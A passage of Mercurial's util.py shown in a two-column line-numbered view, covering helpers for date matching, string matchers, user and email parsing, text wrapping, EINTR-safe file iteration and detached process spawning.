2202 % date[1:])
2207 % date[1:])
2203 when = makedate()[0] - days * 3600 * 24
2208 when = makedate()[0] - days * 3600 * 24
2204 return lambda x: x >= when
2209 return lambda x: x >= when
2205 elif " to " in date:
2210 elif " to " in date:
2206 a, b = date.split(" to ")
2211 a, b = date.split(" to ")
2207 start, stop = lower(a), upper(b)
2212 start, stop = lower(a), upper(b)
2208 return lambda x: x >= start and x <= stop
2213 return lambda x: x >= start and x <= stop
2209 else:
2214 else:
2210 start, stop = lower(date), upper(date)
2215 start, stop = lower(date), upper(date)
2211 return lambda x: x >= start and x <= stop
2216 return lambda x: x >= start and x <= stop
2212
2217
2213 def stringmatcher(pattern, casesensitive=True):
2218 def stringmatcher(pattern, casesensitive=True):
2214 """
2219 """
2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2220 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 returns the matcher name, pattern, and matcher function.
2221 returns the matcher name, pattern, and matcher function.
2217 missing or unknown prefixes are treated as literal matches.
2222 missing or unknown prefixes are treated as literal matches.
2218
2223
2219 helper for tests:
2224 helper for tests:
2220 >>> def test(pattern, *tests):
2225 >>> def test(pattern, *tests):
2221 ... kind, pattern, matcher = stringmatcher(pattern)
2226 ... kind, pattern, matcher = stringmatcher(pattern)
2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2227 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 >>> def itest(pattern, *tests):
2228 >>> def itest(pattern, *tests):
2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2229 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2230 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226
2231
2227 exact matching (no prefix):
2232 exact matching (no prefix):
2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2233 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 ('literal', 'abcdefg', [False, False, True])
2234 ('literal', 'abcdefg', [False, False, True])
2230
2235
2231 regex matching ('re:' prefix)
2236 regex matching ('re:' prefix)
2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2237 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 ('re', 'a.+b', [False, False, True])
2238 ('re', 'a.+b', [False, False, True])
2234
2239
2235 force exact matches ('literal:' prefix)
2240 force exact matches ('literal:' prefix)
2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2241 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 ('literal', 're:foobar', [False, True])
2242 ('literal', 're:foobar', [False, True])
2238
2243
2239 unknown prefixes are ignored and treated as literals
2244 unknown prefixes are ignored and treated as literals
2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2245 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 ('literal', 'foo:bar', [False, False, True])
2246 ('literal', 'foo:bar', [False, False, True])
2242
2247
2243 case insensitive regex matches
2248 case insensitive regex matches
2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2249 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 ('re', 'A.+b', [False, False, True])
2250 ('re', 'A.+b', [False, False, True])
2246
2251
2247 case insensitive literal matches
2252 case insensitive literal matches
2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2253 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 ('literal', 'ABCDEFG', [False, False, True])
2254 ('literal', 'ABCDEFG', [False, False, True])
2250 """
2255 """
2251 if pattern.startswith('re:'):
2256 if pattern.startswith('re:'):
2252 pattern = pattern[3:]
2257 pattern = pattern[3:]
2253 try:
2258 try:
2254 flags = 0
2259 flags = 0
2255 if not casesensitive:
2260 if not casesensitive:
2256 flags = remod.I
2261 flags = remod.I
2257 regex = remod.compile(pattern, flags)
2262 regex = remod.compile(pattern, flags)
2258 except remod.error as e:
2263 except remod.error as e:
2259 raise error.ParseError(_('invalid regular expression: %s')
2264 raise error.ParseError(_('invalid regular expression: %s')
2260 % e)
2265 % e)
2261 return 're', pattern, regex.search
2266 return 're', pattern, regex.search
2262 elif pattern.startswith('literal:'):
2267 elif pattern.startswith('literal:'):
2263 pattern = pattern[8:]
2268 pattern = pattern[8:]
2264
2269
2265 match = pattern.__eq__
2270 match = pattern.__eq__
2266
2271
2267 if not casesensitive:
2272 if not casesensitive:
2268 ipat = encoding.lower(pattern)
2273 ipat = encoding.lower(pattern)
2269 match = lambda s: ipat == encoding.lower(s)
2274 match = lambda s: ipat == encoding.lower(s)
2270 return 'literal', pattern, match
2275 return 'literal', pattern, match
2271
2276
2272 def shortuser(user):
2277 def shortuser(user):
2273 """Return a short representation of a user name or email address."""
2278 """Return a short representation of a user name or email address."""
2274 f = user.find('@')
2279 f = user.find('@')
2275 if f >= 0:
2280 if f >= 0:
2276 user = user[:f]
2281 user = user[:f]
2277 f = user.find('<')
2282 f = user.find('<')
2278 if f >= 0:
2283 if f >= 0:
2279 user = user[f + 1:]
2284 user = user[f + 1:]
2280 f = user.find(' ')
2285 f = user.find(' ')
2281 if f >= 0:
2286 if f >= 0:
2282 user = user[:f]
2287 user = user[:f]
2283 f = user.find('.')
2288 f = user.find('.')
2284 if f >= 0:
2289 if f >= 0:
2285 user = user[:f]
2290 user = user[:f]
2286 return user
2291 return user
2287
2292
2288 def emailuser(user):
2293 def emailuser(user):
2289 """Return the user portion of an email address."""
2294 """Return the user portion of an email address."""
2290 f = user.find('@')
2295 f = user.find('@')
2291 if f >= 0:
2296 if f >= 0:
2292 user = user[:f]
2297 user = user[:f]
2293 f = user.find('<')
2298 f = user.find('<')
2294 if f >= 0:
2299 if f >= 0:
2295 user = user[f + 1:]
2300 user = user[f + 1:]
2296 return user
2301 return user
2297
2302
2298 def email(author):
2303 def email(author):
2299 '''get email of author.'''
2304 '''get email of author.'''
2300 r = author.find('>')
2305 r = author.find('>')
2301 if r == -1:
2306 if r == -1:
2302 r = None
2307 r = None
2303 return author[author.find('<') + 1:r]
2308 return author[author.find('<') + 1:r]
2304
2309
2305 def ellipsis(text, maxlength=400):
2310 def ellipsis(text, maxlength=400):
2306 """Trim string to at most maxlength (default: 400) columns in display."""
2311 """Trim string to at most maxlength (default: 400) columns in display."""
2307 return encoding.trim(text, maxlength, ellipsis='...')
2312 return encoding.trim(text, maxlength, ellipsis='...')
2308
2313
2309 def unitcountfn(*unittable):
2314 def unitcountfn(*unittable):
2310 '''return a function that renders a readable count of some quantity'''
2315 '''return a function that renders a readable count of some quantity'''
2311
2316
2312 def go(count):
2317 def go(count):
2313 for multiplier, divisor, format in unittable:
2318 for multiplier, divisor, format in unittable:
2314 if abs(count) >= divisor * multiplier:
2319 if abs(count) >= divisor * multiplier:
2315 return format % (count / float(divisor))
2320 return format % (count / float(divisor))
2316 return unittable[-1][2] % count
2321 return unittable[-1][2] % count
2317
2322
2318 return go
2323 return go
2319
2324
2320 def processlinerange(fromline, toline):
2325 def processlinerange(fromline, toline):
2321 """Check that linerange <fromline>:<toline> makes sense and return a
2326 """Check that linerange <fromline>:<toline> makes sense and return a
2322 0-based range.
2327 0-based range.
2323
2328
2324 >>> processlinerange(10, 20)
2329 >>> processlinerange(10, 20)
2325 (9, 20)
2330 (9, 20)
2326 >>> processlinerange(2, 1)
2331 >>> processlinerange(2, 1)
2327 Traceback (most recent call last):
2332 Traceback (most recent call last):
2328 ...
2333 ...
2329 ParseError: line range must be positive
2334 ParseError: line range must be positive
2330 >>> processlinerange(0, 5)
2335 >>> processlinerange(0, 5)
2331 Traceback (most recent call last):
2336 Traceback (most recent call last):
2332 ...
2337 ...
2333 ParseError: fromline must be strictly positive
2338 ParseError: fromline must be strictly positive
2334 """
2339 """
2335 if toline - fromline < 0:
2340 if toline - fromline < 0:
2336 raise error.ParseError(_("line range must be positive"))
2341 raise error.ParseError(_("line range must be positive"))
2337 if fromline < 1:
2342 if fromline < 1:
2338 raise error.ParseError(_("fromline must be strictly positive"))
2343 raise error.ParseError(_("fromline must be strictly positive"))
2339 return fromline - 1, toline
2344 return fromline - 1, toline
2340
2345
2341 bytecount = unitcountfn(
2346 bytecount = unitcountfn(
2342 (100, 1 << 30, _('%.0f GB')),
2347 (100, 1 << 30, _('%.0f GB')),
2343 (10, 1 << 30, _('%.1f GB')),
2348 (10, 1 << 30, _('%.1f GB')),
2344 (1, 1 << 30, _('%.2f GB')),
2349 (1, 1 << 30, _('%.2f GB')),
2345 (100, 1 << 20, _('%.0f MB')),
2350 (100, 1 << 20, _('%.0f MB')),
2346 (10, 1 << 20, _('%.1f MB')),
2351 (10, 1 << 20, _('%.1f MB')),
2347 (1, 1 << 20, _('%.2f MB')),
2352 (1, 1 << 20, _('%.2f MB')),
2348 (100, 1 << 10, _('%.0f KB')),
2353 (100, 1 << 10, _('%.0f KB')),
2349 (10, 1 << 10, _('%.1f KB')),
2354 (10, 1 << 10, _('%.1f KB')),
2350 (1, 1 << 10, _('%.2f KB')),
2355 (1, 1 << 10, _('%.2f KB')),
2351 (1, 1, _('%.0f bytes')),
2356 (1, 1, _('%.0f bytes')),
2352 )
2357 )
2353
2358
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2359 # Matches a single EOL which can either be a CRLF where repeated CR
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2360 # are removed or a LF. We do not care about old Macintosh files, so a
2356 # stray CR is an error.
2361 # stray CR is an error.
2357 _eolre = remod.compile(br'\r*\n')
2362 _eolre = remod.compile(br'\r*\n')
2358
2363
2359 def tolf(s):
2364 def tolf(s):
2360 return _eolre.sub('\n', s)
2365 return _eolre.sub('\n', s)
2361
2366
2362 def tocrlf(s):
2367 def tocrlf(s):
2363 return _eolre.sub('\r\n', s)
2368 return _eolre.sub('\r\n', s)
2364
2369
2365 if pycompat.oslinesep == '\r\n':
2370 if pycompat.oslinesep == '\r\n':
2366 tonativeeol = tocrlf
2371 tonativeeol = tocrlf
2367 fromnativeeol = tolf
2372 fromnativeeol = tolf
2368 else:
2373 else:
2369 tonativeeol = pycompat.identity
2374 tonativeeol = pycompat.identity
2370 fromnativeeol = pycompat.identity
2375 fromnativeeol = pycompat.identity
2371
2376
2372 def escapestr(s):
2377 def escapestr(s):
2373 # call underlying function of s.encode('string_escape') directly for
2378 # call underlying function of s.encode('string_escape') directly for
2374 # Python 3 compatibility
2379 # Python 3 compatibility
2375 return codecs.escape_encode(s)[0]
2380 return codecs.escape_encode(s)[0]
2376
2381
2377 def unescapestr(s):
2382 def unescapestr(s):
2378 return codecs.escape_decode(s)[0]
2383 return codecs.escape_decode(s)[0]
2379
2384
2380 def forcebytestr(obj):
2385 def forcebytestr(obj):
2381 """Portably format an arbitrary object (e.g. exception) into a byte
2386 """Portably format an arbitrary object (e.g. exception) into a byte
2382 string."""
2387 string."""
2383 try:
2388 try:
2384 return pycompat.bytestr(obj)
2389 return pycompat.bytestr(obj)
2385 except UnicodeEncodeError:
2390 except UnicodeEncodeError:
2386 # non-ascii string, may be lossy
2391 # non-ascii string, may be lossy
2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2392 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388
2393
2389 def uirepr(s):
2394 def uirepr(s):
2390 # Avoid double backslash in Windows path repr()
2395 # Avoid double backslash in Windows path repr()
2391 return repr(s).replace('\\\\', '\\')
2396 return repr(s).replace('\\\\', '\\')
2392
2397
2393 # delay import of textwrap
2398 # delay import of textwrap
2394 def MBTextWrapper(**kwargs):
2399 def MBTextWrapper(**kwargs):
2395 class tw(textwrap.TextWrapper):
2400 class tw(textwrap.TextWrapper):
2396 """
2401 """
2397 Extend TextWrapper for width-awareness.
2402 Extend TextWrapper for width-awareness.
2398
2403
2399 Neither number of 'bytes' in any encoding nor 'characters' is
2404 Neither number of 'bytes' in any encoding nor 'characters' is
2400 appropriate to calculate terminal columns for specified string.
2405 appropriate to calculate terminal columns for specified string.
2401
2406
2402 Original TextWrapper implementation uses built-in 'len()' directly,
2407 Original TextWrapper implementation uses built-in 'len()' directly,
2403 so overriding is needed to use width information of each characters.
2408 so overriding is needed to use width information of each characters.
2404
2409
2405 In addition, characters classified into 'ambiguous' width are
2410 In addition, characters classified into 'ambiguous' width are
2406 treated as wide in East Asian area, but as narrow in other.
2411 treated as wide in East Asian area, but as narrow in other.
2407
2412
2408 This requires use decision to determine width of such characters.
2413 This requires use decision to determine width of such characters.
2409 """
2414 """
2410 def _cutdown(self, ucstr, space_left):
2415 def _cutdown(self, ucstr, space_left):
2411 l = 0
2416 l = 0
2412 colwidth = encoding.ucolwidth
2417 colwidth = encoding.ucolwidth
2413 for i in xrange(len(ucstr)):
2418 for i in xrange(len(ucstr)):
2414 l += colwidth(ucstr[i])
2419 l += colwidth(ucstr[i])
2415 if space_left < l:
2420 if space_left < l:
2416 return (ucstr[:i], ucstr[i:])
2421 return (ucstr[:i], ucstr[i:])
2417 return ucstr, ''
2422 return ucstr, ''
2418
2423
2419 # overriding of base class
2424 # overriding of base class
2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2425 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 space_left = max(width - cur_len, 1)
2426 space_left = max(width - cur_len, 1)
2422
2427
2423 if self.break_long_words:
2428 if self.break_long_words:
2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2429 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 cur_line.append(cut)
2430 cur_line.append(cut)
2426 reversed_chunks[-1] = res
2431 reversed_chunks[-1] = res
2427 elif not cur_line:
2432 elif not cur_line:
2428 cur_line.append(reversed_chunks.pop())
2433 cur_line.append(reversed_chunks.pop())
2429
2434
2430 # this overriding code is imported from TextWrapper of Python 2.6
2435 # this overriding code is imported from TextWrapper of Python 2.6
2431 # to calculate columns of string by 'encoding.ucolwidth()'
2436 # to calculate columns of string by 'encoding.ucolwidth()'
2432 def _wrap_chunks(self, chunks):
2437 def _wrap_chunks(self, chunks):
2433 colwidth = encoding.ucolwidth
2438 colwidth = encoding.ucolwidth
2434
2439
2435 lines = []
2440 lines = []
2436 if self.width <= 0:
2441 if self.width <= 0:
2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2442 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438
2443
2439 # Arrange in reverse order so items can be efficiently popped
2444 # Arrange in reverse order so items can be efficiently popped
2440 # from a stack of chucks.
2445 # from a stack of chucks.
2441 chunks.reverse()
2446 chunks.reverse()
2442
2447
2443 while chunks:
2448 while chunks:
2444
2449
2445 # Start the list of chunks that will make up the current line.
2450 # Start the list of chunks that will make up the current line.
2446 # cur_len is just the length of all the chunks in cur_line.
2451 # cur_len is just the length of all the chunks in cur_line.
2447 cur_line = []
2452 cur_line = []
2448 cur_len = 0
2453 cur_len = 0
2449
2454
2450 # Figure out which static string will prefix this line.
2455 # Figure out which static string will prefix this line.
2451 if lines:
2456 if lines:
2452 indent = self.subsequent_indent
2457 indent = self.subsequent_indent
2453 else:
2458 else:
2454 indent = self.initial_indent
2459 indent = self.initial_indent
2455
2460
2456 # Maximum width for this line.
2461 # Maximum width for this line.
2457 width = self.width - len(indent)
2462 width = self.width - len(indent)
2458
2463
2459 # First chunk on line is whitespace -- drop it, unless this
2464 # First chunk on line is whitespace -- drop it, unless this
2460 # is the very beginning of the text (i.e. no lines started yet).
2465 # is the very beginning of the text (i.e. no lines started yet).
2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2466 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 del chunks[-1]
2467 del chunks[-1]
2463
2468
2464 while chunks:
2469 while chunks:
2465 l = colwidth(chunks[-1])
2470 l = colwidth(chunks[-1])
2466
2471
2467 # Can at least squeeze this chunk onto the current line.
2472 # Can at least squeeze this chunk onto the current line.
2468 if cur_len + l <= width:
2473 if cur_len + l <= width:
2469 cur_line.append(chunks.pop())
2474 cur_line.append(chunks.pop())
2470 cur_len += l
2475 cur_len += l
2471
2476
2472 # Nope, this line is full.
2477 # Nope, this line is full.
2473 else:
2478 else:
2474 break
2479 break
2475
2480
2476 # The current line is full, and the next chunk is too big to
2481 # The current line is full, and the next chunk is too big to
2477 # fit on *any* line (not just this one).
2482 # fit on *any* line (not just this one).
2478 if chunks and colwidth(chunks[-1]) > width:
2483 if chunks and colwidth(chunks[-1]) > width:
2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2484 self._handle_long_word(chunks, cur_line, cur_len, width)
2480
2485
2481 # If the last chunk on this line is all whitespace, drop it.
2486 # If the last chunk on this line is all whitespace, drop it.
2482 if (self.drop_whitespace and
2487 if (self.drop_whitespace and
2483 cur_line and cur_line[-1].strip() == r''):
2488 cur_line and cur_line[-1].strip() == r''):
2484 del cur_line[-1]
2489 del cur_line[-1]
2485
2490
2486 # Convert current line back to a string and store it in list
2491 # Convert current line back to a string and store it in list
2487 # of all lines (return value).
2492 # of all lines (return value).
2488 if cur_line:
2493 if cur_line:
2489 lines.append(indent + r''.join(cur_line))
2494 lines.append(indent + r''.join(cur_line))
2490
2495
2491 return lines
2496 return lines
2492
2497
2493 global MBTextWrapper
2498 global MBTextWrapper
2494 MBTextWrapper = tw
2499 MBTextWrapper = tw
2495 return tw(**kwargs)
2500 return tw(**kwargs)
2496
2501
2497 def wrap(line, width, initindent='', hangindent=''):
2502 def wrap(line, width, initindent='', hangindent=''):
2498 maxindent = max(len(hangindent), len(initindent))
2503 maxindent = max(len(hangindent), len(initindent))
2499 if width <= maxindent:
2504 if width <= maxindent:
2500 # adjust for weird terminal size
2505 # adjust for weird terminal size
2501 width = max(78, maxindent + 1)
2506 width = max(78, maxindent + 1)
2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2507 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 pycompat.sysstr(encoding.encodingmode))
2508 pycompat.sysstr(encoding.encodingmode))
2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2509 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 pycompat.sysstr(encoding.encodingmode))
2510 pycompat.sysstr(encoding.encodingmode))
2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2511 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 pycompat.sysstr(encoding.encodingmode))
2512 pycompat.sysstr(encoding.encodingmode))
2508 wrapper = MBTextWrapper(width=width,
2513 wrapper = MBTextWrapper(width=width,
2509 initial_indent=initindent,
2514 initial_indent=initindent,
2510 subsequent_indent=hangindent)
2515 subsequent_indent=hangindent)
2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2516 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512
2517
2513 if (pyplatform.python_implementation() == 'CPython' and
2518 if (pyplatform.python_implementation() == 'CPython' and
2514 sys.version_info < (3, 0)):
2519 sys.version_info < (3, 0)):
2515 # There is an issue in CPython that some IO methods do not handle EINTR
2520 # There is an issue in CPython that some IO methods do not handle EINTR
2516 # correctly. The following table shows what CPython version (and functions)
2521 # correctly. The following table shows what CPython version (and functions)
2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2522 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 #
2523 #
2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2524 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 # --------------------------------------------------
2525 # --------------------------------------------------
2521 # fp.__iter__ | buggy | buggy | okay
2526 # fp.__iter__ | buggy | buggy | okay
2522 # fp.read* | buggy | okay [1] | okay
2527 # fp.read* | buggy | okay [1] | okay
2523 #
2528 #
2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2529 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 #
2530 #
2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2531 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2532 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 #
2533 #
2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2534 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2535 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2536 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 # fp.__iter__ but not other fp.read* methods.
2537 # fp.__iter__ but not other fp.read* methods.
2533 #
2538 #
2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2539 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2540 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2541 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2542 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 # to minimize the performance impact.
2543 # to minimize the performance impact.
2539 if sys.version_info >= (2, 7, 4):
2544 if sys.version_info >= (2, 7, 4):
2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2545 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 def _safeiterfile(fp):
2546 def _safeiterfile(fp):
2542 return iter(fp.readline, '')
2547 return iter(fp.readline, '')
2543 else:
2548 else:
2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2549 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 # note: this may block longer than necessary because of bufsize.
2550 # note: this may block longer than necessary because of bufsize.
2546 def _safeiterfile(fp, bufsize=4096):
2551 def _safeiterfile(fp, bufsize=4096):
2547 fd = fp.fileno()
2552 fd = fp.fileno()
2548 line = ''
2553 line = ''
2549 while True:
2554 while True:
2550 try:
2555 try:
2551 buf = os.read(fd, bufsize)
2556 buf = os.read(fd, bufsize)
2552 except OSError as ex:
2557 except OSError as ex:
2553 # os.read only raises EINTR before any data is read
2558 # os.read only raises EINTR before any data is read
2554 if ex.errno == errno.EINTR:
2559 if ex.errno == errno.EINTR:
2555 continue
2560 continue
2556 else:
2561 else:
2557 raise
2562 raise
2558 line += buf
2563 line += buf
2559 if '\n' in buf:
2564 if '\n' in buf:
2560 splitted = line.splitlines(True)
2565 splitted = line.splitlines(True)
2561 line = ''
2566 line = ''
2562 for l in splitted:
2567 for l in splitted:
2563 if l[-1] == '\n':
2568 if l[-1] == '\n':
2564 yield l
2569 yield l
2565 else:
2570 else:
2566 line = l
2571 line = l
2567 if not buf:
2572 if not buf:
2568 break
2573 break
2569 if line:
2574 if line:
2570 yield line
2575 yield line
2571
2576
2572 def iterfile(fp):
2577 def iterfile(fp):
2573 fastpath = True
2578 fastpath = True
2574 if type(fp) is file:
2579 if type(fp) is file:
2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2580 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 if fastpath:
2581 if fastpath:
2577 return fp
2582 return fp
2578 else:
2583 else:
2579 return _safeiterfile(fp)
2584 return _safeiterfile(fp)
2580 else:
2585 else:
2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2586 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 def iterfile(fp):
2587 def iterfile(fp):
2583 return fp
2588 return fp
2584
2589
2585 def iterlines(iterator):
2590 def iterlines(iterator):
2586 for chunk in iterator:
2591 for chunk in iterator:
2587 for line in chunk.splitlines():
2592 for line in chunk.splitlines():
2588 yield line
2593 yield line
2589
2594
2590 def expandpath(path):
2595 def expandpath(path):
2591 return os.path.expanduser(os.path.expandvars(path))
2596 return os.path.expanduser(os.path.expandvars(path))
2592
2597
2593 def hgcmd():
2598 def hgcmd():
2594 """Return the command used to execute current hg
2599 """Return the command used to execute current hg
2595
2600
2596 This is different from hgexecutable() because on Windows we want
2601 This is different from hgexecutable() because on Windows we want
2597 to avoid things opening new shell windows like batch files, so we
2602 to avoid things opening new shell windows like batch files, so we
2598 get either the python call or current executable.
2603 get either the python call or current executable.
2599 """
2604 """
2600 if mainfrozen():
2605 if mainfrozen():
2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2606 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 # Env variable set by py2app
2607 # Env variable set by py2app
2603 return [encoding.environ['EXECUTABLEPATH']]
2608 return [encoding.environ['EXECUTABLEPATH']]
2604 else:
2609 else:
2605 return [pycompat.sysexecutable]
2610 return [pycompat.sysexecutable]
2606 return gethgcmd()
2611 return gethgcmd()
2607
2612
2608 def rundetached(args, condfn):
2613 def rundetached(args, condfn):
2609 """Execute the argument list in a detached process.
2614 """Execute the argument list in a detached process.
2610
2615
2611 condfn is a callable which is called repeatedly and should return
2616 condfn is a callable which is called repeatedly and should return
2612 True once the child process is known to have started successfully.
2617 True once the child process is known to have started successfully.
2613 At this point, the child process PID is returned. If the child
2618 At this point, the child process PID is returned. If the child
2614 process fails to start or finishes before condfn() evaluates to
2619 process fails to start or finishes before condfn() evaluates to
2615 True, return -1.
2620 True, return -1.
2616 """
2621 """
2617 # Windows case is easier because the child process is either
2622 # Windows case is easier because the child process is either
2618 # successfully starting and validating the condition or exiting
2623 # successfully starting and validating the condition or exiting
2619 # on failure. We just poll on its PID. On Unix, if the child
2624 # on failure. We just poll on its PID. On Unix, if the child
2620 # process fails to start, it will be left in a zombie state until
2625 # process fails to start, it will be left in a zombie state until
2621 # the parent wait on it, which we cannot do since we expect a long
2626 # the parent wait on it, which we cannot do since we expect a long
2622 # running process on success. Instead we listen for SIGCHLD telling
2627 # running process on success. Instead we listen for SIGCHLD telling
2623 # us our child process terminated.
2628 # us our child process terminated.
2624 terminated = set()
2629 terminated = set()
2625 def handler(signum, frame):
2630 def handler(signum, frame):
2626 terminated.add(os.wait())
2631 terminated.add(os.wait())
2627 prevhandler = None
2632 prevhandler = None
2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2633 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 if SIGCHLD is not None:
2634 if SIGCHLD is not None:
2630 prevhandler = signal.signal(SIGCHLD, handler)
2635 prevhandler = signal.signal(SIGCHLD, handler)
2631 try:
2636 try:
2632 pid = spawndetached(args)
2637 pid = spawndetached(args)
2633 while not condfn():
2638 while not condfn():
2634 if ((pid in terminated or not testpid(pid))
2639 if ((pid in terminated or not testpid(pid))
2635 and not condfn()):
2640 and not condfn()):
2636 return -1
2641 return -1
2637 time.sleep(0.1)
2642 time.sleep(0.1)
2638 return pid
2643 return pid
2639 finally:
2644 finally:
2640 if prevhandler is not None:
2645 if prevhandler is not None:
2641 signal.signal(signal.SIGCHLD, prevhandler)
2646 signal.signal(signal.SIGCHLD, prevhandler)
2642
2647
2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2648 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 """Return the result of interpolating items in the mapping into string s.
2649 """Return the result of interpolating items in the mapping into string s.
2645
2650
2646 prefix is a single character string, or a two character string with
2651 prefix is a single character string, or a two character string with
2647 a backslash as the first character if the prefix needs to be escaped in
2652 a backslash as the first character if the prefix needs to be escaped in
2648 a regular expression.
2653 a regular expression.
2649
2654
2650 fn is an optional function that will be applied to the replacement text
2655 fn is an optional function that will be applied to the replacement text
2651 just before replacement.
2656 just before replacement.
2652
2657
2653 escape_prefix is an optional flag that allows using doubled prefix for
2658 escape_prefix is an optional flag that allows using doubled prefix for
2654 its escaping.
2659 its escaping.
2655 """
2660 """
2656 fn = fn or (lambda s: s)
2661 fn = fn or (lambda s: s)
2657 patterns = '|'.join(mapping.keys())
2662 patterns = '|'.join(mapping.keys())
2658 if escape_prefix:
2663 if escape_prefix:
2659 patterns += '|' + prefix
2664 patterns += '|' + prefix
2660 if len(prefix) > 1:
2665 if len(prefix) > 1:
2661 prefix_char = prefix[1:]
2666 prefix_char = prefix[1:]
2662 else:
2667 else:
2663 prefix_char = prefix
2668 prefix_char = prefix
2664 mapping[prefix_char] = prefix_char
2669 mapping[prefix_char] = prefix_char
2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2670 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2671 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667
2672
2668 def getport(port):
2673 def getport(port):
2669 """Return the port for a given network service.
2674 """Return the port for a given network service.
2670
2675
2671 If port is an integer, it's returned as is. If it's a string, it's
2676 If port is an integer, it's returned as is. If it's a string, it's
2672 looked up using socket.getservbyname(). If there's no matching
2677 looked up using socket.getservbyname(). If there's no matching
2673 service, error.Abort is raised.
2678 service, error.Abort is raised.
2674 """
2679 """
2675 try:
2680 try:
2676 return int(port)
2681 return int(port)
2677 except ValueError:
2682 except ValueError:
2678 pass
2683 pass
2679
2684
2680 try:
2685 try:
2681 return socket.getservbyname(port)
2686 return socket.getservbyname(port)
2682 except socket.error:
2687 except socket.error:
2683 raise Abort(_("no port number associated with service '%s'") % port)
2688 raise Abort(_("no port number associated with service '%s'") % port)
2684
2689
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2690 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2691 '0': False, 'no': False, 'false': False, 'off': False,
2687 'never': False}
2692 'never': False}
2688
2693
2689 def parsebool(s):
2694 def parsebool(s):
